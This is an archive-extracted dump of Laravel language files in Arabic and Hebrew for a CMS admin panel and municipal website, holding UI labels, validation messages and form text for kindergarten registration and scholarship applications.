'تعديل', 'delete' => 'حذف', 'undoDelete' => 'تراجع عن الحذف', 'cancel' => 'إلغاء', 'apply' => 'تنفيذ', 'active' => 'مفعل', 'notActive' => 'غير مفعل', 'status' => 'الحالة', 'visits' => 'الزيارات', 'contents' => 'المحتويات', 'options' => 'خيارات', 'showing' => 'عرض', 'bulkAction' => 'الخيارات', 'activeSelected' => 'تفعيل السجلات', 'blockSelected' => 'حظر السجلات', 'deleteSelected' => 'حذف المحدد', 'of' => 'من أصل', 'records' => 'سجلات', 'confirmation' => 'تأكيد', 'yes' => 'نعم', 'no' => 'لا', 'confirmationDeleteMsg' => 'هل أنت متأكد أنك تريد الحذف بالفعل؟', 'sectionsOf' => 'تصنيفات ', 'comments' => 'التعليقات ', 'videoTypes' => 'الأنواع المسموحة: mp4, ogv, webm', 'imagesTypes' => 'الأنواع المسموحة: .png, .jpg, .jpeg, .gif', 'audioTypes' => 'الأنواع المسموحة: .mp3, .wav', 'attachTypes' => 'الأنواع المسموحة: .* الكل', 'addDone' => 'تمت عملية الإضافة بنجاح', 'saveDone' => 'تمت حفظ التعديلات التي أجريتها بنجاح', 'deleteDone' => 'تمت حذف البيانات بنجاح', 'erorr' => 'هناك خطأ ، يرجى المحاولة مرة أخرى', 'noData' => 'لا يوجد أية بيانات هنا حتى الآن', 'appsSettings' => 'تفعيل التطبيقات', 'fieldsSettings' => 'اعدادات الحقول', 'frontSettings' => 'إعدادات الواجهة', 'arabicLanguageFields' => 'تفعيل حقول اللغة العربية', 'englishLanguageFields' => 'تفعيل حقول اللغة الإنجليزية', 'seoTab' => 'تفعيل تبويب SEO', 'seoTabTitle' => 'خيارات SEO', 'defaultCurrency' => 'العملة الإفتراضية', 'commentsStatus' => 'وضع التعليقات', 'automaticPublish' => 'تفعيل مباشر عند الإضافة', 'manualByAdmin' => 'يدويا بعد المراجعة', 'headerMenu' => 'قائمة الهيدر', 'footerMenu' => 'قائمة التذييل', 'homeSlideBanners' => 'البنرات بالصفحة الرئيسية', 'homeTextBanners' => ' البنرات النصية بالرئيسية', 'sideBanners' => 'بنرات جانبية', 'none' => 'بدون', 'newsletterGroup' => 'المجموعة الخاصة بإيميلات النشرة البريدية', 'homeRow1' => 'محتويات الرئيسة الصف الأول', 'homeRow2' => 'محتويات الرئيسية الصف الثاني', 'homeRow3' => 'أخر الموضوعات بالفوتر', 'contactPageId' => 'صفحة اتصل بنا (التفاصيل والخرائط)', 'activeLanguages' => 'اللغات المفعلة', 'activeLanguages1' => 'لغة واحدة ( الإفتراضية في .env )', 'activeLanguages2' => 'جميع اللغات', 'homeBanners' => 'بنرات الرئيسية', 'textBanners' => 'بنرات نصية', 'sectionName' => 'عنوان القسم', 'sectionType' => 'نوع القسم', 'sectionNew' => 'إضافة قسم جديد', 'sectionEdit' => 'تعديل القسم', 'sectionIcon' => 'أيقونة', 'sectionFather' => 'متفرع من', 'sectionNoFather' => 'قسم رئيسي', 'size' => 'المقاس', 'width' => 'العرض', 'height' => 'الإرتفاع', 'descriptionBox' => 'حقل للوصف', 'linkBox' => 'حقل لرابط عند الضغط', 'sectionTypeCode' => 'كود / نص', 'sectionTypePhoto' => 'صورة', 'sectionTypeVideo' => 'فيديو', 'langVar' => 'اسم متغير اللغة', 'sitePages' => 'صفحات الموقع', 'photos' => 'الصور', 'blog' => 'المدونة', 'services' => 'الخدمات', 'news' => 'الأخبار', 'videos' => 'الفيديو', 'sounds' => 'الصوتيات', 'products' => 'المنتجات', 'typeTextPages' => 'صفحات عامة', 'typePhotos' => 'صور', 'typeVideos' => 'فيديوهات', 'typeSounds' => 'صوتيات', 'hasCategories' => 'الفئات', 'reviewsAvailable' => 'تفعيل التعليقات', 'dateField' => 'حقل التاريخ', 'longTextField' => 'حقل نص طويل', 'allowEditor' => 'إستخدام المحرر', 'attachFileField' => 'حقل ملف مرفق', 'additionalImages' => 'صور إضافية', 'attachGoogleMaps' => 'إرفاق خرائط جوجل', 'attachOrderForm' => 'إرفاق نموذج للطلب', 'withoutCategories' => 'بدون تصنيفات', 'mainCategoriesOnly' => 'تصنيفات رئيسية فقط', 'mainAndSubCategories' => 'تصنيفات رئيسية وفرعية', 'sectionIconPicker' => 'إختيار أيقونة للقسم', 'topicsIconPicker' => 'إختيار أيقونة للموضوعات', 'iconPicker' => 'إختيار أيقونة', 'siteInfoSettings' => 'بيانات الموقع', 'siteStatusSettings' => 'حالة الموقع', 'siteSocialSettings' => 'الشبكات الإجتماعية', 'siteContactsSettings' => 'بيانات الإتصال', 'websiteTitle' => 'عنوان الموقع', 'metaDescription' => 'وصف الموقع', 'metaKeywords' => 'كلمات دلالية', 'websiteUrl' => 'رابط الموقع', 'websiteNotificationEmail' => 'بريد استلام التلميحات', 'websiteNotificationEmail1' => 'ارسل لي بريد في حالة رسائل جديدة', 'websiteNotificationEmail2' => 'ارسل لي بريد في حالة تعليقات جديدة', 'websiteNotificationEmail3' => 'ارسل لي بريد في حالة طلبات جديدة', 'emailNotifications' => 'رسائل التنبيه', 'contactAddress' => 'العنوان', 'contactPhone' => 'الهاتف', 'contactFax' => 'الفاكس', 'contactMobile' => 'الموبايل', 'contactEmail' => 'البريد الإلكتروني', 'worksTime' => 'مواعيد العمل', 'siteStatusSettingsPublished' => 'نشرت', 'siteStatusSettingsClosed' => 'مغلق', 'siteStatusSettingsMsg' => 'رسالة في حالة الإغلاق', 'facebook' => 'Facebook', 'twitter' => 'Twitter', 'google' => 'Google+', 'linkedin' => 'Linkedin', 'youtube' => 'Youtube', 'instagram' => 'Instagram', 'pinterest' => 'Pinterest', 'tumblr' => 'Tumblr', 'flickr' => 'Flickr', 'whatapp' => 'Whatsapp', 'styleSettings' => 'خيارات التصميم', 'siteLogo' => 'شعار الموقع', 'favicon' => 'ايقونة المفضلة', 'appleIcon' => 'ايقونة آبل', 'styleColor1' => 'لون التصميم الأساسي', 'styleColor2' => 'لون التصميم الثانوى', 'restoreDefault' => 'إستعادة الإفتراضي', 'layoutMode' => 'نظام القالب', 'wide' => 'عرض كامل Wide', 'boxed' => 'عرض محدد Boxed', 'backgroundStyle' => 'نوع الخلفية', 'colorBackground' => 'لون', 'patternsBackground' => 'رسومي', 'imageBackground' => 'صورة', 'newsletterSubscribe' => 'الإشتراك في النشرة البريدية', 'footerStyle' => 'تصميم الفوتر', 'footerStyleBg' => 'خلفية الفوتر', 'preLoad' => 'التحميل المسبق (جاري التحميل)', 'bannerAdd' => ' إضافة بنر جديد', 'bannerEdit' => 'تعديل البنر', 'bannerTitle' => 'عنوان الإعلان', 'bannerSection' => 'القسم', 'bannerPhoto' => 'صورة الإعلان', 'bannerDetails' => 'التفاصيل', 'bannerLinkUrl' => 'رابط عند الضغط', 'bannerVideoType' => 'نوع الفيديو', 'bannerVideoType1' => 'فيديو مباشر', 'bannerVideoType2' => 'فيديو من يوتيوب', 'bannerVideoType3' => 'فيديو من فيميو', 'bannerVideoFile' => 'ملف الفيديو', 'bannerVideoUrl' => 'رابط الفيديو من يوتيوب', 'bannerVideoUrl2' => 'رابط الفيديو من فيميو', 'bannerCode' => 'كود البنر', 'topicNew' => 'إضافة ', 'topicEdit' => 'تعديل ', 'topicName' => ' العنوان', 'topicPhoto' => 'صورة', 'topicSection' => 'القسم', 'topicSelectSection' => 'حدد القسم', 'topicDate' => 'التاريخ', 'topicAudio' => 'الملف الصوتي', 'topicVideo' => 'ملف الفيديو ', 'topicAttach' => 'ملف مرفق', 'topicDeletedSection' => 'غير تابع لأي قسم', 'topicTabSection' => 'تفاصيل القسم', 'topicTabDetails' => 'تفاصيل الموضوع', 'topicSEOTitle' => 'عنوان الصفحة', 'topicSEODesc' => 'الوصف', 'topicSEOKeywords' => 'الكلمات الدلالية', 'topicAdditionalPhotos' => 'الصور', 'topicGoogleMaps' => 'خرائط جوجل', 'topicDropFiles' => 'ادرج الصور هنا أو انقر للتحميل', 'topicDropFiles2' => 'يمكنك تحميل العديد من الصور في نفس الوقت', 'topicCommentName' => 'الإسم', 'topicCommentEmail' => 'البريد الإلكتروني', 'topicComment' => 'التعليق', 'topicNewComment' => 'تعليق جديد', 'topicNewMap' => 'إضافة خريطة', 'topicMapTitle' => 'العنوان', 'topicMapDetails' => 'التفاصيل', 'topicMapLocation' => 'الموقع', 'topicMapIcon' => 'أيقونة', 'topicMapClick' => 'إضغط علي المكان الذي تريد الإضافة فية', 'topicMapORClick' => 'أو يمكنك الإضافة يدويا من هنا', 'allContacts' => 'جميع المسجلين', 'waitActivation' => 'بإنتظار التفعيل', 'blockedContacts' => 'المسجلين المحظورين', 'newGroup' => 'مجموعة جديدة', 'newContacts' => 'إضافة حساب جديد', 'editContacts' => 'تعديل الحساب', 'deleteContacts' => 'حذف الحساب', 'searchAllContacts' => 'بحث في جميع المسجلين', 'firstName' => 'الإسم الأول', 'lastName' => 'الإسم الأخير', 'companyName' => 'اسم الشركة', 'city' => 'المدينة', 'country' => 'الدولة', 'notes' => 'ملاحظات', 'group' => 'مجموعة', 'sendEmail' => 'ارسال بريد', 'callNow' => 'اتصل الآن', 'selectFile' => 'حدد الملف', 'labels' => 'تسميات', 'inbox' => 'البريد الوارد', 'sent' => 'أرسلت', 'draft' => 'المسودة', 'compose' => 'رسالة جديدة', 'makeAsRead' => 'اجعلها مقروءة', 'makeAsUnread' => 'اجعلها غير مقروءة', 'moveTo' => 'نقل إلى ', 'replay' => 'رد على الرسالة', 'forward' => 'إعادة توجيه', 'sendTo' => 'إلى', 'sendFrom' => 'من', 'sendCc' => 'Cc', 'sendBcc' => 'Bcc', 'sendTitle' => 'عنوان الرسالة', 'SaveToDraft' => 'حفظ بالمسودة', 'send' => 'ارسال', 'print' => 'طباعة', 'AttachFiles' => 'ملفات مرفقة', 'newEvent' => 'اضافة حدث / ملاحظة', 'eventTotal' => 'الاجمالي', 'eventTitle' => 'عنوان', 'eventStart' => 'بداية الحدث', 'eventEnd' => 'نهاية الحدث', 'eventStart2' => 'تاريخ البداية', 'eventEnd2' => 'تاريخ النهاية', 'eventDetails' => 'التفاصيل', 'eventNote' => 'ملاحظة', 'eventMeeting' => 'موعد', 'eventEvent' => 'حدث', 'eventTask' => 'مهمة', 'eventType' => 'النوع', 'eventAt' => 'في', 'eventToday' => 'اليوم', 'eventDay' => 'عرض يومي', 'eventWeek' => 'أسبوعي', 'eventMonth' => 'شهري', 'eventDelete' => 'حذف هذا الحدث / الملاحظة؟', 'eventClear' => 'حذف جميع الملاحظات والفعاليات؟', 'diagram' => 'رسم بياني', 'barDiagram' => 'عرض البيانات في شكل رسم بياني', 'visitors' => 'عدد الزوار', 'ip' => 'IP', 'pageViews' => 'عدد الصفحات', 'today' => 'اليوم', 'yesterday' => 'أمس', 'last7Days' => 'أخر 7 أيام', 'last30Days' => 'أخر 30 يوم', 'thisMonth' => 'الشهر الحالي', 'lastMonth' => 'الشهر الماضي', 'applyFrom' => 'من', 'applyTo' => 'إلى', 'customRange' => 'فترة مخصصة', 'weekDays' => '"Su", "Mo", "Tu", "We", "Th", "Fr", "Sa"', 'monthsNames' => '"January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"', 'activity' => 'النشاط', 'activitiesHistory' => 'سجل الأنشطة', 'newUser' => 'إضافة مستخدم جديد', 'editUser' => 'تعديل مستخدم', 'fullName' => 'الإسم بالكامل', 'Permission' => 'نوع الصلاحيات', 'Permission1' => 'مسؤول الموقع', 'Permission2' => 'مدير الموقع ( جميع الصلاحيات )', 'Permission3' => 'مستخدم عادي ( بدون حذف )', 'Permission4' => 'مشرف/مراجع ( عرض فقط )', 'personalPhoto' => 'صورة شخصية', 'loginEmail' => 'البريد الإلكتروني', 'loginPassword' => 'كلمة المرور', 'users' => 'المستخدمين', 'permissions' => 'الصلاحيات', 'newPermissions' => 'إضافة صلاحية جديدة', 'title' => 'العنوان', 'dataManagements' => 'إدارة البيانات', 'dataManagements1' => 'المحتوى الخاص به فقط (للعضويات الشخصية فقط)', 'dataManagements2' => 'كافة المحتويات من جميع المستخدمين (لعضويات الإدارة العامة)', 'activeApps' => 'التطبيقات المفعلة', 'activeSiteSections' => 'أقسام الموقع المفعلة', 'addPermission' => 'صلاحية الإضافة', 'editPermission' => 'صلاحية التعديل', 'deletePermission' => 'صلاحية الحذف', 'viewOnly' => 'مشاهدة فقط', 'editPermissions' => 'تعديل الصلاحيات', 'perAdd' => 'الإضافة', 'perEdit' => 'التعديل', 'perDelete' => 'الحذف', 'selectPermissionsType' => 'حدد نوع الصلاحية', 'newLink' => 'اضافة رابط جديد', 'newMenu' => 'اضافة قائمة جديدة', 'menuTitle' => 'عنوان القائمة', 'editSection' => 'تعديل رابط', 'linkType' => 'نوع الرابط', 'linkType1' => 'عنوان رئيسي', 'linkType2' => 'رابط مباشر', 'linkType3' => 'قسم رئيسي', 'linkType4' => 'قائمة منسدلة لقسم', 'linkURL' => 'الرابط', 'linkSection' => 'قسم الرابط', 'sectionTitle' => 'عنوان القسم / الرابط', 'fatherSection' => 'القسم الرئيسي', 'latestMessages' => 'أحدث الرسائل', 'notesEvents' => 'الملاحظات والأحداث', 'latestContacts' => 'جديد جهات الإتصال', 'more' => 'المزيد', 'viewMore' => 'مشاهدة المزيد', 'addNew' => 'إضافة', 'reports' => 'التقارير', 'reportsDetails' => 'يمكنك مشاهدة المزيد من التقارير', 'hi' => 'أهلاً', 'welcomeBack' => 'مرحباً بعودتك', 'lastFor7Days' => 'الزوار لأخر ٧ أيام', 'todayByCountry' => 'زوار اليوم حسب الدولة', 'browsers' => 'متصفح الإنترنت', 'browsersCalculated' => 'نسبة المتصفحات حسب أخر ٧ أيام', 'visitorsRate' => 'معدل الزوار', 'visitorsRateToday' => 'معدل الزوار خلال اليوم الحالي', 'pages' => 'الصفحات', 'sections' => 'الأقسام', 'resultsFoundFor' => 'نتائج البحث عن', 'connectEmailToConnect' => 'ربط مع البريد الإلكتروني', 'connectEmail' => 'البريد الإلكتروني', 'connectPassword' => 'كلمة المرور', 'openWebmail' => 'افتح البريد الإلكتروني', 'themeSwitcher' => 'التصميم واللغة', 'foldedAside' => 'مطوية جانبا', 'boxedLayout' => 'تصغير عرض النافذة', 'themes' => 'التصاميم', 'themes1' => 'فاتح', 'themes2' => 'رمادي', 'themes3' => 'غامق', 'themes4' => 'أسود', 'language' => 'اللغة', 'change' => 'حفظ التغييرات', 'sitePreview' => ' معاينة الموقع', 'oops' => 'عفوا', 'noPermission' => 'نأسف ! ليس لديك الصلاحية لزيارة هذه الصفحة', 'notFound' => 'نأسف! الصفحة التي تبحث عنها غير موجودة', 'forgotPassword' => 'نسيت كلمة المرور؟', 'signIn' => 'تسجيل الدخول', 'keepMeSignedIn' => 'حفظ بيانات تسجيل الدخول', 'signedInToControl' => 'تسجيل الدخول إلى لوحة التحكم', 'control' => 'لوحة التحكم', 'resetPassword' => 'إستعادة كلمة المرور', 'confirmPassword' => 'تاكيد كلمة المرور', 'newPassword' => 'كلمة مرور جديدة', 'yourEmail' => 'بريدك الإلكتروني', 'sendPasswordResetLink' => 'ارسال رابط استعادة كلمة المرور', 'returnTo' => 'عودة للخلف', 'enterYourEmail' => 'أدخل عنوان البريد الالكتروني أدناه وسوف نرسل لك التعليمات حول كيفية تغيير كلمة المرور الخاصة بك.', 'expireDateField' => 'حقل تاريخ الإنتهاء', 'expireDate' => 'تاريخ الإنتهاء', 'expired' => 'منتهي', 'additionalFiles' => 'ملفات إضافية', 'relatedTopics' => 'مواضيع ذات صلة', 'relatedTopicsAdd' => 'إضافة مواضيع ذات صلة', 'relatedTopicsSelect' => 'حدد القسم أولا لإختيار المواضيع', 'customFields' => 'حقول إضافية', 'customFieldsTitle' => 'عنوان الحقل', 'customFieldsType' => 'نوع الحقل', 'customFieldsStatus' => 'الحالة', 'customFieldsNewField' => 'إضافة حقل جديد', 'customFieldsEditField' => 'تعديل حقل', 'customFieldsRequired' => 'مطلوب', 'customFieldsOptional' => 'إختياري', 'customFieldsDefault' => 'القيمة الإفتراضية', 'customFieldsOptions' => 'الإختيارات', 'customFieldsOptionsHelp' => 'اكتب كل إختيار على سطر منفصل', 'customFieldsForAllLang' => 'لجميع اللغات', 'customFieldsType0' => 'حقل نصي', 'customFieldsType1' => 'نص طويل', 'customFieldsType2' => 'رقم', 'customFieldsType3' => 'بريد إلكتروني', 'customFieldsType4' => 'تاريخ', 'customFieldsType5' => 'تاريخ ووقت', 'customFieldsType6' => 'إختيار من متعدد', 'customFieldsType7' => 'إختيارات متعددة', 'customFieldsType8' => 'صورة', 'customFieldsType9' => 'ملف مرفق', 'customFieldsType10' => 'ملف فيديو', 'customFieldsType11' => 'رابط فيديو من يوتيوب', 'customFieldsType12' => 'رابط فيديو من فيميو', 'optionalFields' => 'الحقول الإختيارية', 'additionalTabs' => 'تبويبات إضافية', 'active_disable' => 'تفعيل/إيقاف', 'friendlyURL' => 'عنوان صديق', 'seoTabSettings' => 'إدارة عنوان الصفحة، وصف ميتا، الكلمات الدلالية ورابط الصفحة. هذا يساعدك على إدارة كيفية ظهور هذا الموضوع على محركات البحث.', 'friendlyURLinks' => 'طريقة روابط الواجهة', 'friendlyURLinks1' => 'استخدام الروابط الإفتراضية', 'friendlyURLinks2' => 'استخدام الروابط صديقة محركات البحث ', 'registrationSettings' => 'إعدادات التسجيل', 'allowRegister' => 'تفعيل إمكانية التسجيل في لوحة التحكم', 'permissionForNewUsers' => 'مجموعة صلاحيات المسجلين الجدد', 'createNewAccount' => 'إنشاء حساب جديد', 'APIStatus' => 'تفعيل RESTful API', 'APIKey' => 'API مفتاح', 'APIKeyGenerate' => 'إنشاء مفتاح جديد', 'APIKeyConfirm' => 'هل تريد بالفعل إنشاء مفتاح جديد؟', 'homeRow_3' => 'محتويات الرئيسة الصف الثالث', 'partners' => 'العملاء', 'HebrewLanguageFields' => 'حقول اللغة العبرية', 'departments' => 'أقسام', 'History' => 'تاريخ', 'attachformForm' => 'إرفاق نموذج', 'form' => 'نموذج', 'pupilSex' => 'جنس الطالب', 'kindergartenReg' => 'تسجيل لرياض الاطفال', 'pupilName' => 'إسم الطالب', 'pupilbirthday' => 'تأريخ ميلاد الطالب', 'pupilRegInfo' => 'معلومات الطالب', 'Year' => 'سنة', 'Hood' => 'حارة', 'kindergartenInfo' => 'معلومات الروضة', 'parentsInfo' => 'معلومات عن الأهل', 'Gname' => 'الروضة', 'identification' => 'رقم الهوية', 'address' => 'العنوان', 'notificationSubject' => 'التسجيل لرياض الاطفال', 'notificationReg' => 'تمت عملية التسجيل بنجاح وسوف يتم التواصل معكم قريبا', 'applicationSubmitSubject' => 'تصريح إقامة', 'applicationSubmitMsg' => 'حضرة المواطن المحترم لقد تم إستقبال طلبك وسوف نقوم بمعالجته بأسرع وقت بعدها سوف يتم التواصل معك', 'applicationSubmitBackend' => 'تقدم بطلب تصريح إقامة الرجاء الإسراع في معالجة طلبه.', 'getNotifications' => 'إعلام بإرسال نماذج', 'contacts' => 'جهات الإتصال', ); lang/ar/desktop.ini000064400000000216147565226300010252 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 lang/ar/pagination.php000064400000001026147565226300010742 0ustar00 '« Previous', 'next' => 'Next »', ]; lang/he/passwords.php000064400000000712147565226300010631 0ustar00 'סיסמאות חייבות לכלול לפחות שישה תווים ולהתאים את האישור.', 'reset' => 'הסיסמה שלך אופסה!', 'sent' => 'יש לנו בדואר אלקטרוני את הקישור לאיפוס הסיסמה!', 'token' => 'אסימון איפוס הסיסמה אינו חוקי.', 'user' => 'לא ניתן למצוא משתמש עם כתובת האימייל הזו.', ); lang/he/auth.php000064400000000350147565226300007543 0ustar00 'אישורים אלה אינם תואמים את הרשומות שלנו.', 'throttle' => 'יותר מדי ניסיונות התחברות. נסה שוב בעוד: שניות שניות.', ); lang/he/validation.php000064400000014742147565226300010746 0ustar00 'The :attribute must be accepted.', 'active_url' => 'The :attribute is not a valid URL.', 'after' => 'The :attribute must be a date after :date.', 'after_or_equal' => 'The :attribute must be a date after or equal to :date.', 'alpha' => 'The :attribute may only contain letters.', 'alpha_dash' => 'The :attribute may only contain letters, numbers, and dashes.', 'alpha_num' => 'The :attribute may only contain letters and numbers.', 'array' => 'The :attribute must be an array.', 'before' => 'The :attribute must be a date before :date.', 'before_or_equal' => 'The :attribute must be a date before or equal to :date.', 'between' => [ 'numeric' => 'The :attribute must be between :min and :max.', 'file' => 'The :attribute must be between :min and :max kilobytes.', 'string' => 'The :attribute must be between :min and :max characters.', 'array' => 'The :attribute must have between :min and :max items.', ], 'boolean' => 'The :attribute field must be true or false.', 'confirmed' => 'The :attribute confirmation does not match.', 'date' => 'The :attribute is not a valid date.', 'date_format' => 'The :attribute does not match the format :format.', 'different' => 'The :attribute and :other must be different.', 'digits' => 'The :attribute must be :digits digits.', 'digits_between' => 'The :attribute must be between :min and :max digits.', 'dimensions' => 'The :attribute has invalid image dimensions.', 'distinct' => 'The :attribute field has a duplicate value.', 'email' => 'The :attribute must be a valid email address.', 'exists' => 'The selected :attribute is invalid.', 'file' => 'The :attribute must be a file.', 'filled' => 'The :attribute field must have a value.', 'image' => 'The :attribute must be an image.', 'in' => 'The selected :attribute is invalid.', 'in_array' => 'The :attribute field does not exist in :other.', 'integer' => 'The :attribute must be an integer.', 'ip' => 'The :attribute must be a valid IP address.', 'ipv4' => 'The :attribute must be a valid IPv4 address.', 'ipv6' => 'The :attribute must be a valid IPv6 address.', 'json' => 'The :attribute must be a valid JSON string.', 'max' => [ 'numeric' => 'The :attribute may not be greater than :max.', 'file' => 'The :attribute may not be greater than :max kilobytes.', 'string' => 'The :attribute may not be greater than :max characters.', 'array' => 'The :attribute may not have more than :max items.', ], 'mimes' => 'The :attribute must be a file of type: :values.', 'mimetypes' => 'The :attribute must be a file of type: :values.', 'min' => [ 'numeric' => 'The :attribute must be at least :min.', 'file' => 'The :attribute must be at least :min kilobytes.', 'string' => 'The :attribute must be at least :min characters.', 'array' => 'The :attribute must have at least :min items.', ], 'not_in' => 'The selected :attribute is invalid.', 'numeric' => 'The :attribute must be a number.', 'present' => 'The :attribute field must be present.', 'regex' => 'The :attribute format is invalid.', 'required' => 'The :attribute field is required.', 'required_if' => 'The :attribute field is required when :other is :value.', 'required_unless' => 'The :attribute field is required unless :other is in :values.', 'required_with' => 'The :attribute field is required when :values is present.', 'required_with_all' => 'The :attribute field is required when :values is present.', 'required_without' => 'The :attribute field is required when :values is not present.', 'required_without_all' => 'The :attribute field is required when none of :values are present.', 'same' => 'The :attribute and :other must match.', 'size' => [ 'numeric' => 'The :attribute must be :size.', 'file' => 'The :attribute must be :size kilobytes.', 'string' => 'The :attribute must be :size characters.', 'array' => 'The :attribute must contain :size items.', ], 'string' => 'The :attribute must be a string.', 'timezone' => 'The :attribute must be a valid zone.', 'unique' => 'The :attribute has already been taken.', 'uploaded' => 'The :attribute failed to upload.', 'url' => 'The :attribute format is invalid.', /* |-------------------------------------------------------------------------- | Custom Validation Language Lines |-------------------------------------------------------------------------- | | Here you may specify custom validation messages for attributes using the | convention "attribute.rule" to name the lines. This makes it quick to | specify a specific custom language line for a given attribute rule. | */ 'custom' => [ 'attribute-name' => [ 'rule-name' => 'custom-message', ], ], /* |-------------------------------------------------------------------------- | Custom Validation Attributes |-------------------------------------------------------------------------- | | The following language lines are used to swap attribute place-holders | with something more reader friendly such as E-Mail Address instead | of "email". This simply helps us make messages a little cleaner. | */ 'attributes' => [], ]; lang/he/index.php000064400000000000147565226300007701 0ustar00lang/he/frontLang.php000064400000014501147565226300010537 0ustar00 'לוח בקרה', 'toTop' => 'למעלה', 'AllRightsReserved' => 'כל הזכויות שמורות', 'moreDetails' => 'פרטים נוספים', 'viewMore' => 'ראה עוד', 'readMore' => 'פרטים', 'downloadAttach' => 'קבצים מצורפים', 'contactDetails' => 'מידע ליצירת קשר', 'callUs' => 'התקשר עכשיו', 'callFax' => 'פקס', 'callMobile' => 'נייד', 'callPhone' => 'טלפון', 'callTimes' => 'שעות עבודה', 'address' => 'כותרת', 'name' => 'שם', 'email' => 'דוא"ל', 'phone' => 'מס טלפון', 'latestNews' => 'חדשות אחרונות', 'ourGallery' => 'גלרית תמונות', 'subscribeToOurNewsletter' => 'הירשם לניוזלטר שלנו', 'subscribeToOurNewsletterDone' => 'ההירשמות בוצעה בהצלחה', 'subscribeToOurNewsletterError' => 'כבר נרשמת', 'newsletter' => 'עלון', 'subscribe' => 'הירשם', 'yourEmail' => 'הדוא"ל שלך', 'yourName' => 'שם שלך', 'enterYourName' => 'אנא הכנס את שמך', 'enterYourEmail' => 'הזן את כתובת הדוא"ל שלך', 'enterYourPhone' => 'אנא הזן את מספר הטלפון שלך', 'enterYourSubject' => 'הזן נושא להודעה שלך', 'enterYourMessage' => 'הקלד את ההודעה שלך', 'youMessageSent' => 'ההודעה שלך נשלחה בהצלחה, ניצור איתך קשר בהקדם האפשרי. תודה!', 'youMessageNotSent' => 'שגיאה: בבקשה לנסות שוב', 'subject' => 'כותרת ההודעה', 'message' => 'הוֹדָעָה', 'sendMessage' => 'שלח הודעה', 'workingHours' => 'שעות עבודה', 'categories' => 'קטגוריות', 'noData' => 'אין נתונים כאן עד עכשיו', 'mostViewed' => 'הנצפים ביותר', 'share' => 'שתף', 'locationMap' => 'מפת האתר', 'comments' => 'תגובות', 'comment' => 'תגובה', 'enterYourComment' => 'הזן את ההערה שלך', 'sendComment' => 'שלח תגובה', 'youCommentSent' => 'תגובה הוספה בהצלחה', 'newComment' => 'הוספת תגובה חדשה', 'refresh' => 'עדכון', 'getInTouch' => 'צור איתנו קשר על ידי מילוי טופס יצירת קשר בהמשך', 'homeContents1Title' => 'כתבות אחרונות', 'homeContents1desc' => 'המאמרים האחרונים של הבלוג שלנו, אתה יכול לגלוש יותר', 'homeContents2Title' => 'עבודות אחרונות', 'homeContents2desc' => 'חלק מהעבודות האחרונות שלנו, אתה יכול לגלוש יותר', 'search' => 'חפש ב...', 'visits' => 'צפיות', 'orderForm' => 'טופס', 'quantity' => 'כמות', 'yourQuantity' => 'הזן כמות', 'notes' => 'הערות', 'sendOrder' => 'שלח בקשה', 'youOrderSent' => 'הבקשה נשלחה בהצלחה ואנו ניצור איתך קשר בהקדם האפשרי.', 'partners' => 'השותפים שלנו', 'partnersMsg' => 'שותפויות ארוכות טווח עם חברות מובילות ובינלאומיות מובילות', 'parentDetails' => 'פרטי הורה', 'fullName' => 'שם מלא', 'idNumber' => 'תעודת זהות', 'pupilDetails' => 'פרטי תלמיד', 'cname' => 'שם תלמיד', 'chooseSex' => 'מין', 'female' => 'נקבה', 'male' => 'זכר', 'KindergardenDetails' => 'פרטי גן', 'KindergardenYear1' => 'גן שנה 1', 'chooseNeighborhood' => 'בחר שכונה', 'KindergardenYear2' => 'גן שנה 2', 'KindergardenYear3' => 'גן שנה 3', 'chooseStage' => 'בחר שלב', 'northernNeighborhood' => 'שכונה צפונית', 'easternNeighborhood' => 'שכונה מזרחית', 'westernNeighborhood' => 'שכונה מערבית', 'southernNeighborhood' => 'שכונה דרומית', 'choosekindergarden' => 'בחר גן', 'applicationSubmission' => 'הגשת בקשה', 'pName' => 'שם פרטי', 'NoFileChosen' => 'לא נבחר קובץ', 'fName' => 'שם משפחה', 'yourFamilyName' => 'שם משפחה', 'fillForm' => 'מלא טופס', 'click' => 'לחץ', 'IdFileMessage' => 'טען מסמך תעודת זהות של המועמד כולל ספח מלא', 'schoolership' => 'הגשת בקשת מלגה', 'gotSchoolerShip' => 'קבלת מלגה בעבר:', 'notGotSchoolerShip' => 'הריני מצהיר שלא קיבלתי בעבר מלגת מפעל הפיס', 'study' => 'לימודים', 'familyInfo' => 'משפחה', 'institute' => 'מוסד הלימודים', 'studyStart' => 'מועד התחלת הלימודים', 'studySubject' => 'תחום הלימודים', 'degree' => 'סוג תואר', 'CollectionDepartmentApproval' => 'אישור מחלקת גבייה על היעדר חובות בגין מסים עירוניים בשנת 2019\\2020 לרבות הסדרת חובות עירוניים...', 'fatherName' => 'שם האב', 'brotherscountUnder21' => 'מס\' אחים רווקים עד גיל 21', 'studentbrothers' => 'מס\' אחים רווקים סטודנטים לתואר ראשון (לא כולל המועמד/ת)', 'motherId' => 'מס ת.ז של האם:', 'motherName' => 'שם האם', 'fatherId' => 'מס ת.ז של האב:', 'socialSituation' => 'מצב סוציאלי', 'notWorkingDeclaration' => 'הצהרה לא עובד', 'disabilityStatement' => 'הצהרת נכות', 'notworkingfather' => 'אבא לא עובד ( יש לצרף אישור מביטול לאומי)', 'notworkingmother' => 'אמא לא עובדת ( יש לצרף אישור מביטול לאומי)', 'disabilityparent1' => 'נכות הורה 1 ( יש לצרף אישור מביטול לאומי)', 'disabilityparent2' => 'נכות הורה 2 ( יש לצרף אישור מביטול לאומי)', 'MaritalStatus' => 'מצב משפחתי:', 'employmentstatus' => 'מעמד תעסוקתי', 'schoolerShipSum' => 'סכום המלגה', 'birthday' => 'תאריך לידה', 'iGotSchoolerShip' => 'קיבלתי בעבר מלגת מפעל הפיס', 'studySalaryFile' => 'אישור על מספר שעות לימוד ושכר לימוד', 'studyfile' => 'נא לצרף אישור לימודים רשמי..', 'shevyon' => 'אתר המועצה המקומית נתמך כספית על ידי המשרד לשוויון חברתי', ); lang/he/backLang.php000064400000053364147565226300010321 0ustar00 'rtl', 'code' => 'he', 'lang' => 'AR', 'left' => 'right', 'right' => 'left', 'arabicBox' => '[ العربية ]', 'englishBox' => '[ English ]', 'hebrewBox' => '[ עברית ]', 'rtl' => 'rtl', 'ltr' => 'ltr', 'boxCode' => 'he', 'boxCodeOther' => 'en', 'translations' => 'תרגום מילים', 'calendarLanguage' => 'he', 'home' => 'דף בית', 'main' => 'ראשי', 'siteData' 